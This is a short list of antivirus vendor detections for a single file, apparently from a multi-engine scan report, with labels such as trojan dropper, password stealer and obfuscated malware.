ZoneAlarm HEUR:Trojan-Dropper.MSIL.Dapato.gen
GData IL:Trojan.MSILZilla.25637
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5161034
Acronis suspicious
MAX malware (ai score=83)
Cylance unsafe
Rising Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:UY+uln4R3IJxA6Ig8NJR8w)
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Zilla.5637!tr
AVG Win32:PWSX-gen [Trj]
Cybereason malicious.6d34ae
DeepInstinct MALICIOUS